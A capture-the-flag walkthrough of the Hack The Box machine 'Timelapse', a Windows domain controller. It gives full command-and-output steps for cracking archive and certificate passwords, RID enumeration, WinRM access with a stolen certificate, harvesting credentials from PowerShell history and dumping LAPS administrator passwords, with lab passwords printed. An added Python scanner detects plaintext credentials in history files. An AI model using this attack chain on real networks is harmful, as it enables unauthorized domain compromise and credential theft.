Timelapse - [HTB]
Introduction
Timelapse is an easy Windows machine where the attacker has to use a certificate and some RID enumeration to access the machine as the user "legacyy". Then, looking at the PowerShell history, they find credentials for a user who can read LAPS passwords. Finally, using crackmapexec, the attacker obtains the DC's password and, with it, the root flag.
Enumeration
As always, let's start by finding all open ports on the machine with Nmap.
kali@kali:~/Documents/HTB/Timelapse$ sudo nmap -v -sS -p- -n -T4 -oN AllPorts.txt 10.10.11.52
Nmap scan report for 10.10.11.52
Host is up (0.18s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
54552/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Then, we continue with a deeper scan of every open port to get more information about each service.
kali@kali:~/Documents/HTB/Timelapse$ sudo nmap -sC -sV -n -T4 -oN PortsDepth.txt -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49696,54552 10.10.11.52
Nmap scan report for 10.10.11.52
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-28 04:14:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-03-28T04:16:06+00:00; +7h59m59s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
54552/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-28T04:15:28
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 27 16:16:10 2022 -- 1 IP address (1 host up) scanned in 106.26 seconds
Thanks to Nmap, it was possible to obtain the hostname of the machine, dc01.timelapse.htb, and its domain, timelapse.htb.
Looking at the SMB service without credentials, there is a share named Shares.
kali@kali:~/Documents/HTB/Timelapse$ smbclient -N -L //dc01.timelapse.htb/
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to dc01.timelapse.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Enumerating the share, there is a winrm_backup.zip file and LAPS documentation.
kali@kali:~/Documents/HTB/Timelapse$ smbclient -N //dc01.timelapse.htb/Shares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1192342 blocks available
smb: \> cd Dev\
smb: \Dev\> dir
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 1192342 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \Dev\> cd ..\HelpDesk\
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
The backup file is password protected. Nonetheless, it can be cracked pretty easily with john.
kali@kali:~/Documents/HTB/Timelapse$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
kali@kali:~/Documents/HTB/Timelapse$ zip2john winrm_backup.zip > zip_hash.txt
kali@kali:~/Documents/HTB/Timelapse$ john -w=/usr/share/wordlists/rockyou.txt zip_hash.txt
[...]
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
Inside the zip file, there is a Windows certificate (a PFX file).
kali@kali:~/Documents/HTB/Timelapse$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
inflating: legacyy_dev_auth.pfx
This certificate is also password protected. However, once again, it can be cracked with john.
kali@kali:~/Documents/HTB/Timelapse$ sudo apt install john-data -y
kali@kali:~/Documents/HTB/Timelapse$ pfx2john legacyy_dev_auth.pfx > legacy_dev_hasht.txt
kali@kali:~/Documents/HTB/Timelapse$ john -w=/usr/share/wordlists/rockyou.txt legacy_dev_hasht.txt
[...]
thuglegacy (legacyy_dev_auth.pfx)
Moreover, doing some RID brute-forcing, it can be discovered that "legacyy" is a valid user on the AD domain.
kali@kali:~/Documents/HTB/Timelapse$ crackmapexec smb dc01.timelapse.htb -d timelapse.htb -u 'guest' -p '' --rid-brute | grep -i user
SMB dc01.timelapse.htb 445 DC01 500: TIMELAPSE\Administrator (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 501: TIMELAPSE\Guest (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 502: TIMELAPSE\krbtgt (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 513: TIMELAPSE\Domain Users (SidTypeGroup)
SMB dc01.timelapse.htb 445 DC01 525: TIMELAPSE\Protected Users (SidTypeGroup)
SMB dc01.timelapse.htb 445 DC01 1000: TIMELAPSE\DC01$ (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1601: TIMELAPSE\thecybergeek (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1602: TIMELAPSE\payl0ad (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1603: TIMELAPSE\legacyy (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1604: TIMELAPSE\sinfulz (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1605: TIMELAPSE\babywyrm (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1606: TIMELAPSE\DB01$ (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1607: TIMELAPSE\WEB01$ (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 1608: TIMELAPSE\DEV01$ (SidTypeUser)
SMB dc01.timelapse.htb 445 DC01 3103: TIMELAPSE\svc_deploy (SidTypeUser)
Exploitation
Because the only service that accepts this certificate is WinRM over HTTPS (port 5986), and evil-winrm expects the private key and certificate as separate PEM files, we need to convert the Windows PFX into that format. After that, you will obtain the user flag.
kali@kali:~/Documents/HTB/Timelapse$ openssl pkcs12 -in legacyy_dev_auth.pfx -out private.key -nocerts -nodes
Enter Import Password:
kali@kali:~/Documents/HTB/Timelapse$ openssl pkcs12 -in legacyy_dev_auth.pfx -out certificate.pem -nokeys -clcerts
kali@kali:~/Documents/HTB/Timelapse$ evil-winrm -S -c certificate.pem -k private.key -i dc01.timelapse.htb -u legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
[CENSORED]
Privilege Escalation
Looking at legacyy's PowerShell console history, we can find credentials used to access the machine through WinRM as the user "svc_deploy".
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
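As an added example (not part of the original writeup), a small Python scanner a defender can run over collected PSReadLine history files to find exactly this pattern: credential literals passed to ConvertTo-SecureString, PSCredential or password switches, plus remoting sessions that disable TLS checks. The sample history and its passwords are constructed placeholders, not the box's real file.

```python
import re
from typing import List, Tuple

# Constructed sample PSReadLine history (not the box's real file); secrets are placeholders.
SAMPLE_HISTORY = r"""whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Placeholder-Secret-123' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_example', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net use Z: \\fs01\share /user:CORP\svc_backup "Another-Placeholder!"
get-aduser -filter * -properties *
exit
"""

# (rule name, regex). A regex may define a 'secret' group naming the literal to redact.
RULES = [
    # Password typed as a literal and wrapped into a SecureString on the command line.
    ("plaintext-securestring",
     re.compile(r"ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.+?)(?P=q).*-AsPlainText", re.I)),
    # PSCredential built from two string literals (user, password).
    ("pscredential-literal",
     re.compile(r"PSCredential\s*\(\s*(?P<q>['\"])[^'\"]+(?P=q)\s*,\s*(?P<q2>['\"])(?P<secret>.+?)(?P=q2)", re.I)),
    # Quoted literal after -p/-pass/-password or after a 'net use ... /user:' argument.
    ("password-argument",
     re.compile(r"(?:(?<![\w-])-p(?:ass(?:word)?)?|/user:\S+)\s+(?P<q>['\"])(?P<secret>.+?)(?P=q)", re.I)),
    # Not a secret, but TLS validation being disabled for a remoting session is worth a look.
    ("tls-check-bypass", re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I)),
]

def scan_history(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, rule name, redacted line) for each suspicious line.
    The secret is cut out before the line is reported, so the scanner never copies it."""
    findings: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            if "secret" in rx.groupindex:
                s, e = m.span("secret")
                line = line[:s] + "<REDACTED>" + line[e:]
            findings.append((lineno, name, line))
            break  # one finding per line is enough
    return findings

if __name__ == "__main__":
    for lineno, rule, redacted in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno:>3}  {rule:<24} {redacted}")
```

Point it at each user's AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt collected from a host to triage which accounts have been typed in the clear.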
Enumerating this user, you can see that it is a member of the "LAPS_Readers" group.
*Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
[...]
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
Hence, thanks to crackmapexec's LAPS module, we can retrieve the LAPS passwords, including DC01's.
Note: this password changes on every machine reset.
kali@kali:~/Documents/HTB/Timelapse$ crackmapexec ldap 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' --kdcHost 10.10.11.152 -M laps
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS 10.10.11.152 389 DC01 [*] Getting LAPS Passwords
LAPS 10.10.11.152 389 DC01 Computer: DC01$ Password: 7-&#sh5C%]y@LGtq{ET8Yi{1
Finally, we can obtain the root flag by accessing the machine as Administrator.
kali@kali:~/Documents/HTB/Timelapse$ evil-winrm -i 10.10.11.152 -S -u Administrator -p '7-&#sh5C%]y@LGtq{ET8Yi{1'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:/Users/TRX/Desktop/root.txt"
[CENSORED_FLAG]